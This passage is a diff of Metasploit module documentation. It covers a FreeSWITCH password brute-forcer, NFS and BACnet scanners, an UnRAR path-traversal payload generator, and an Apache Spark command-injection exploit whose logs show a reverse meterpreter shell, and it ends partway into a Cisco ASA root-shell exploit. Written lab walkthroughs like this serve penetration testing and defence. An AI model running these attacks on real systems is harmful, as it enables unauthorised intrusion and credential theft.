+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -1,65 +1,102 @@
 ## Vulnerable Application

-NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version.  Installation instructions for NFS can be found for every operating system.
-The [Ubuntu 14.04](https://help.ubuntu.com/14.04/serverguide/network-file-system.html) instructions can be used as an example for installing and configuring NFS.  The
+NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version.
+Installation instructions for NFS can be found for every operating system.
+The [Ubuntu](https://ubuntu.com/server/docs/service-nfs)
+instructions can be used as an example for installing and configuring NFS.  The
 following was done on Kali linux:
-  
-  1. `apt-get install nfs-kernel-server`
-  2. Create 2 folders to share:
-    ```
-    mkdir /tmp/open_share
-    mkdir /tmp/closed_share
-    ```
-  3. Add them to the list of shares:
-  ```
-  echo "/tmp/closed_share  10.1.2.3(ro,sync,no_root_squash)" >> /etc/exports
-  echo "/tmp/open_share    *(rw,sync,no_root_squash)" >> /etc/exports
-  ```
-  4. Restart the service: `service nfs-kernel-server restart`

-In this scenario, `closed_share` is set to read only, and only mountable by the IP 10.1.2.3.  `open_share` is mountable by anyone (`*`) in read/write mode.
+1. `apt-get install nfs-kernel-server`
+2. Create folders to share and add them to exports (adjust 192.168.1.x as needed):
+```
+mkdir /tmp/star
+echo "/tmp/star    *(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_hostname
+echo "/tmp/not_us_hostname    foo(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_hostname
+echo "/tmp/us_hostname    bar(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_ip
+echo "/tmp/not_us_ip    1.1.1.1(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_ip
+echo "/tmp/us_ip    192.168.1.111(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_subnet
+echo "/tmp/not_us_subnet    1.1.1.1/24(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_subnet
+echo "/tmp/us_subnet    192.168.1.1/24(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_netmask
+echo "/tmp/not_us_netmask    1.1.1.1/255.255.255.0(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_netmask
+echo "/tmp/us_netmask    192.168.1.1/255.255.255.0(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/empty
+echo "/tmp/empty    (rw,no_subtree_check)" >> /etc/exports
+```
+3. Restart the service: `service nfs-kernel-server restart`
+
+## Options
+
+### PROTOCOL
+Which networking protocol to use. Options are `udp` and `tcp`. Defaults to `udp`.
+
+### LHOST
+IP to match shares against if `Mountable` is true. Defaults to the detected local IP address.
+
+### HOSTNAME
+Hostname to match shares against if `Mountable` is true. Defaults to `` (empty string)
+
+## Advanced Options
+
+### Mountable
+
+Determine if an export is mountable based on `LHOST` and `HOSTNAME`. Defaults to `true`. Pre 2022 behavior was `false`

 ## Verification Steps

-  1. Install and configure NFS
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/nfs/nfsmount`
-  4. Do: `run`
+1. Install and configure NFS
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/nfs/nfsmount`
+4. Do: `run`

 ## Scenarios

-  A run against the configuration from these docs
+A run against the configuration from these docs

-  ```
-    msf > use auxiliary/scanner/nfs/nfsmount
-    msf auxiliary(nfsmount) > set rhosts 127.0.0.1
-    rhosts => 127.0.0.1
-    msf auxiliary(nfsmount) > run
-    
-    [+] 127.0.0.1:111         - 127.0.0.1 NFS Export: /tmp/open_share [*]
-    [+] 127.0.0.1:111         - 127.0.0.1 NFS Export: /tmp/closed_share [10.1.2.3]
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-  ```
-  
-  Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
-  
-  ```
-    [*] Scanned  24 of 240 hosts (10% complete)
-    [+] 10.10.xx.xx NFS Export: /data/iso [0.0.0.0/0.0.0.0]
-    [*] Scanned  48 of 240 hosts (20% complete)
-    [+] 10.10.xx.xx NFS Export: /DataVolume/Public [*]
-    [+] 10.10.xx.xx NFS Export: /DataVolume/Download [*]
-    [+] 10.10.xx.xx NFS Export: /DataVolume/Softshare [*]
-    [*] Scanned  72 of 240 hosts (30% complete)
-    [+] 10.10.xx.xx NFS Export: /var/ftp/pub [10.0.0.0/255.255.255.0]
-    [*] Scanned  96 of 240 hosts (40% complete)
-    [+] 10.10.xx.xx NFS Export: /common []
-  ```
+```
+msf > use auxiliary/scanner/nfs/nfsmount
+msf auxiliary(nfsmount) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf auxiliary(nfsmount) > run
+
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/empty [*]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/star [*]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/us_netmask [10.1.1.1/255.255.255.0]
+[*] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/not_us_netmask [1.1.1.1/255.255.255.0]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/us_subnet [10.1.1.1/24]
+[*] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/not_us_subnet [1.1.1.1/24]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/us_ip [192.168.1.111]
+[*] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/not_us_ip [1.1.1.1]
+[*] 127.0.0.1:111       - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
+
+```
+[*] Scanned  24 of 240 hosts (10% complete)
+[+] 10.10.xx.xx NFS Export: /data/iso [0.0.0.0/0.0.0.0]
+[*] Scanned  48 of 240 hosts (20% complete)
+[+] 10.10.xx.xx NFS Export: /DataVolume/Public [*]
+[+] 10.10.xx.xx NFS Export: /DataVolume/Download [*]
+[+] 10.10.xx.xx NFS Export: /DataVolume/Softshare [*]
+[*] Scanned  72 of 240 hosts (30% complete)
+[+] 10.10.xx.xx NFS Export: /var/ftp/pub [10.0.0.0/255.255.255.0]
+[*] Scanned  96 of 240 hosts (40% complete)
+[+] 10.10.xx.xx NFS Export: /common []
+```

 ## Confirming

-Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to verify this configuration issue.
+Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to
+verify this configuration issue.
 The following are other industry tools which can also be used.

 ### [nmap](https://nmap.org/nsedoc/scripts/nfs-showmount.html)
@@ -73,8 +110,14 @@ Host is up (0.000037s latency).
 PORT    STATE SERVICE
 111/tcp open  rpcbind
 | nfs-showmount: 
-|   /tmp/open_share *
-|_  /tmp/closed_share 10.1.2.3
+|   /tmp/empty *
+|   /tmp/star *
+|   /tmp/us_netmask 10.1.1.1/255.255.255.0
+|   /tmp/not_us_netmask 1.1.1.1/255.255.255.0
+|   /tmp/us_subnet 10.1.1.1/24
+|   /tmp/not_us_subnet 1.1.1.1/24
+|   /tmp/us_ip 192.168.1.111
+|_  /tmp/not_us_ip 1.1.1.1

 Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
 ```
@@ -86,14 +129,21 @@ showmount is a part of the `nfs-common` package for debian.
 ```
 showmount -e 127.0.0.1
 Export list for 127.0.0.1:
-/tmp/open_share   *
-/tmp/closed_share 10.1.2.3
+/tmp/empty          *
+/tmp/star           *
+/tmp/us_netmask     10.1.1.1/255.255.255.0
+/tmp/not_us_netmask 1.1.1.1/255.255.255.0
+/tmp/us_subnet      10.1.1.1/24
+/tmp/not_us_subnet  1.1.1.1/24
+/tmp/us_ip          192.168.1.111
+/tmp/not_us_ip      1.1.1.1
 ```

 ## Exploitation

 Exploiting this mis-configuration is trivial, however exploitation doesn't necessarily give access (command execution) to the system.
-If a share is mountable, ie you either are the IP listed in the filter (or could assume it through a DoS), or it is open (*), mounting is trivial.
+If a share is mountable, ie you either are the IP listed in the filter (or could assume it through a DoS),
+or it is open (*), mounting is trivial.
 The following instructions were written for Kali linux.

 1. Create a new directory to mount the remote volume to: `mkdir /mnt/remote`
@@ -0,0 +1,74 @@
+## Vulnerable Application
+BACnet is a Data Communication Protocol for Building Automation and Control Networks.
+Developed under the auspices of the American Society of Heating,
+ Refrigerating and Air-Conditioning Engineers (ASHRAE), BACnet is an American national standard,
+ a European standard, a national standard in more than 30 countries, and an ISO global standard.
+ The protocol is supported and maintained by ASHRAE Standing Standard Project Committee 135
+
+This script polls bacnet devices with a l3 broadcast Who-is message
+and for each reply communicates further to discover more data and saves the data into metasploit.
+Each bacnet device responds with this data:
+- It's IP address, and BACnet/IP address (if the device is nested).
+- It's device number.
+- Model name.
+- Application software version.
+- Firmware revision.
+- Device description.
+## Verification Steps
+
+  1. Start msfconsole.
+  2. Do: `use auxiliary/scanner/scada/bacnet_l3`.
+  3. Do: `set INTERFACE`.
+  5. Do: `run`.
+  6. Devices running the BACnet protocol should respond with data.
+
+## Options
+A user can choose between the interfaces of his host (e.g. eth1, ens192...),
+the number of Who-is packets to send - for reliability purposes, the time (in seconds) to wait for packets to arrive
+and the UDP port, the default is 47808.
+
+The user can always check these options via the `show options` command.
+
+```
+msf auxiliary(profinet_siemens) > show options
+
+Module options (auxiliary/scanner/scada/bacnet_l3):
+
+Name       Current Setting  Required  Description
+----       ---------------  --------  -----------
+COUNT      1                yes       The number of times to send each packet
+INTERFACE  eth1             yes       The interface to scan from
+PORT       47808            yes       BACnet/IP UDP port to scan (usually between 47808-47817)
+TIMEOUT    1                yes       The socket connect timeout in seconds
+```
+
+## Scenarios
+
+The following demonstrates a basic scenario, we "detect" two devices:
+
+```
+
+msf > use auxiliary/scanner/scada/bacnet_l3
+msf auxiliary(auxiliary/scanner/scada/bacnet_l3) > run
+
+[*] Broadcasting Who-is via eth1
+[*] found 2 devices
+[*] Querying device number 826001 in ip 192.168.13.11
+[*] Querying device number 4194303 in ip 192.168.13.12
+[*] Done scanning
+[+] for asset number 826001:
+        model name: iSMA-B-4U4A-H-IP
+        firmware revision: 6.2
+        application software version: GC5 6.2
+        description: BACnet iSMA-B-4U4A-H-IP Module
+
+[+] for asset number 4194303:
+        model name: PXG3.L-1
+        firmware revision: FW=01.21.30.38;WPC=1.4.131;SVS-300:SBC=13.21;
+        application software version:
+        description: BacnetRouter
+
+[+] Successfully saved data to local store named bacnet-discovery.xml
+[*] Done.
+[*] Auxiliary module execution completed
+```
@@ -25,6 +25,35 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -node
 If you receive `gethostbyname failure` error in `openssl`, add the client (metasploit)
 IP and hostname to your hosts file.

+### Using docker
+
+Using the environment created by [vulhub](https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160)
+
+First create a new docker-compose file:
+
+```
+version: '2'
+services:
+ nginx:
+   image: vulhub/openssl:1.0.1c-with-nginx
+   ports:
+    - "8080:80"
+    - "8443:443"
+```
+
+Then run `docker-compose up` and verify that the service is running with:
+
+```
+$ curl https://localhost:8443 -k
+<html>
+<head><title>404 Not Found</title></head>
+<body bgcolor="white">
+<center><h1>404 Not Found</h1></center>
+<hr><center>nginx/1.11.13</center>
+</body>
+</html>
+```
+
 ## Verification Steps

  1. Install a vulnerable OpenSSL, start the service
@@ -26,6 +26,8 @@ A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 H

 The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.

+The format is `1122334455667788`.
+
 **JOHNPWFILE**

 A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes will be stored in separate files.
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+This module creates a generic RAR file containing whatever `PAYLOAD` the user configured.
+
+## Verification Steps
+
+To generate the .rar file:
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../tmp/docstest.txt
+TARGET_PATH => ../../../../../../tmp/docstest.txt
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../tmp/docstest.txt
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then, with a vulnerable versions of UnRAR (see the link above), extract it:
+
+```
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ./unrar x -o+ ~/.msf4/local/payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+Extracting from /home/ron/.msf4/local/payload.rar
+
+Extracting  hhgdzigwkgv                                               OK 
+Extracting  hhgdzigwkgv                                               OK 
+All OK
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ls -l hhgdzigwkgv 
+lrwxrwxrwx. 1 ron games 34 Jul 27 13:04 hhgdzigwkgv -> ../../../../../../tmp/docstest.txt
+
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ file /tmp/docstest.txt
+/tmp/docstest.txt: data
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate, typically it's `payload.rar` and that works fine.
+
+### `TARGET_PATH`
+
+The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.
+
+### `SYMLINK_FILENAME`
+
+If set, use a specific filename for the symlink inside the RAR file - default (random) is almost always best.
+
+### `CUSTOM_PAYLOAD`
+
+If set, instead of encoding the configured payload, encode data from the given filename.
+
+## Scenarios
+
+This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.
+
+We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.
+
+### Built-in payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.bin
+TARGET_PATH => ../../../../../../../../tmp/evil.bin
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../../../tmp/evil.bin
+[*] Encoding configured payload
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  xkmcxqotn                                                 OK 
+Extracting  xkmcxqotn                                                 OK 
+All OK
+ron@fedora ~/.msf4/local $ file /tmp/evil.bin
+/tmp/evil.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+```
+
+### Custom payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.sh
+TARGET_PATH => ../../../../../../../../tmp/evil.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+[*] exec: echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set CUSTOM_PAYLOAD /tmp/test.sh
+CUSTOM_PAYLOAD => /tmp/test.sh
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  jwbhkf                                                    OK 
+Extracting  jwbhkf                                                    OK 
+All OK
+ron@fedora ~/.msf4/local $ bash /tmp/evil.sh
+ron
+/tmp/evil.sh: line 4: $'\177P\336': command not found
+[...]
+```
+
+(The errors at the bottom are because we append random junk to the end for padding)
+
+
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`.
+With an authentication filter, this checks whether a user has access permissions to view or modify the application.
+The permission check is coded using a bash command shell and the unix id command that allows a malicious shell command injection.
+
+Ironically the `spark.acls.enable` configuration setting is designed to improve the security access within the Spark application,
+but unfortunately this configuration setting triggers the vulnerable code below.
+
+```
+private def getUnixGroups(username: String): Set[String] = {
+    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
+    // we need to get rid of the trailing "\n" from the result of command execution
+    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
+  }
+}
+```
+
+This will result in arbitrary shell command execution as the user `Spark`.
+
+This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1
+
+Installing a vulnerable version of Apache Spark to test this vulnerability is quite easy.
+
+To set the server up use the following docker-compose.yml file and follow the steps below:
+```
+version: '2'
+
+services:
+  spark:
+    image: docker.io/bitnami/spark:3.1.1
+    environment:
+      - SPARK_MODE=master
+      - SPARK_RPC_AUTHENTICATION_ENABLED=no
+      - SPARK_RPC_ENCRYPTION_ENABLED=no
+      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
+      - SPARK_SSL_ENABLED=no
+    ports:
+      - '8080:8080'
+```
+
+1. Create the docker-compose.yml in your preferred directory and run `docker-compose up`. Let the container spin up.
+1. In a new terminal, enter `sudo docker exec -it spark_spark_1 /bin/bash`
+1. In the container bash session, enter: `echo "spark.acls.enable true" >> conf/spark-defaults.conf`
+1. cat the contents of spark-defaults.conf to make sure it looks good.
+1. Exit the interactive bash shell and Ctrl-C your docker-compose process.
+1. Once the containers have powered down gracefully, rerun `docker-compose up`
+
+Once the server and application is up, it's vulnerable and you can access it on port 8080 for testing...
+
+## Verification Steps
+
+1. `use exploit/linux/http/apache_spark_rce_cve_2022_33891`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell or meterpreter as the `spark` user.
+
+## Options
+
+No specific options to be set.
+
+## Scenarios
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit with spark.acls.enable set to true
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[*] Perform sleep test of 10 seconds...
+[+] The target is vulnerable. Sleep was around 10 seconds [10.033867019]!
+[*] Exploiting...
+[*] Sending stage (40164 bytes) to 192.168.100.43
+[-] Meterpreter session 3 is not valid and will be closed
+[*] 192.168.100.43 - Meterpreter session 3 closed.
+[*] Sending stage (40168 bytes) to 192.168.100.43
+[*] Meterpreter session 4 opened (192.168.100.7:4444 -> 192.168.100.43:62618) at 2022-08-26 10:49:46 +0000
+
+meterpreter > sysinfo
+Computer     : 7a26a9fb7ce3
+OS           : Linux 5.10.104-linuxkit #1 SMP Thu Mar 17 17:08:06 UTC 2022
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid
+Server username: spark
+```
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit WITHOUT the spark.acls.enable option
+
+Note: This version is vulnerable, however the `spark.acls.enable` option is not set, hence the vulnerable code will not be triggered.
+Response on POST payload request will be 200 instead of 403.
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(inux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The 192.168.100.43:8080 did not respond a 403 response. "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
+```
+
+## Limitations
+The check to determine if the application is vulnerable is based on a 403 response and the execution of a randomized `sleep` command.
+The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
+Timing the sleep command execution is therefore a pretty safe bet to check if the command injection is successful.
+
+Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authenticated command injection vulnerability affecting
+Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+machine as the root user. Access to the virtual machine allows the attacker to
+pivot to the inside network, and access the outside network. Also, the SFR
+virtual machine is running snort on the traffic flowing through the ASA, so
+the attacker should have access to this diverted traffic as well.
+
+This module requires ASDM credentials in order to traverse the ASDM interface.
+A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+implemented here. This attack also assumes the module is installed and
+configured.
+
+Finally, it's worth noting that this attack bypasses the effects of the
+`lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+available but this attack makes it available).
+
+Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+
+### Setup
+
+Cisco ASA that support the FirePOWER Services module are, to our knowledge,
+strictly hardware firewalls and not capable of being emulated. As such,
+testing requires a physical device. Once a device is acquired, you'll
+additionally need access to Cisco downloads of ASDM, ASA software, and the
+FirePOWER Services Software for ASA. Unfortunately, Cisco hides these
+behind a paywall (or a "contract" wall).
+
+However, if you do acquire a Cisco ASA that supports the FirePOWER Services
+module, then it will likely come with the module pre-installed. These systems
+do support downgrading of the module via uninstall and reinstallation. If
+you need to follow that course, then I found the following [guide](https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-configure-firepower-00.html#anc5) to be an excellent guide that
+demonstrates how to install the FirePOWER module from boot image through
+full installation.
+
+This particular module exploits the FirePOWER module via ASDM, so you'll need
+that installed and running as well. Likely, the ASA will have an ASDM binary
+package already installed, but if not you'll need to download that from Cisco
+and copy it onto the ASA. However, once that is complete, you can run the
+following commands to start ASDM and enable it on the inside/outside network.
+
+```
+asdm image disk0:/asdm<version>.bin
+http server enable
+http network mask inside
+http network mask outside
+```
+
+Where network and mask are who you want to be able to access it and inside
+is the zone. E.g. "0.0.0.0 0.0.0.0 outside" is the internet. And that should
+satisfy the pre-requisites for exploitation (ASDM+sfr).
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/http/cisco_asax_sfr_rce`
+* Do: `set USERNAME <username>`
+* Do: `set PASSWORD <password>`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+### USERNAME
+
+The username to authenticate with the ASDM http web server with.
+
+### PASSWORD
+
+The password to authenticate with the ASDM http web server with.
+
+## Scenarios
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a root shell
+
+```
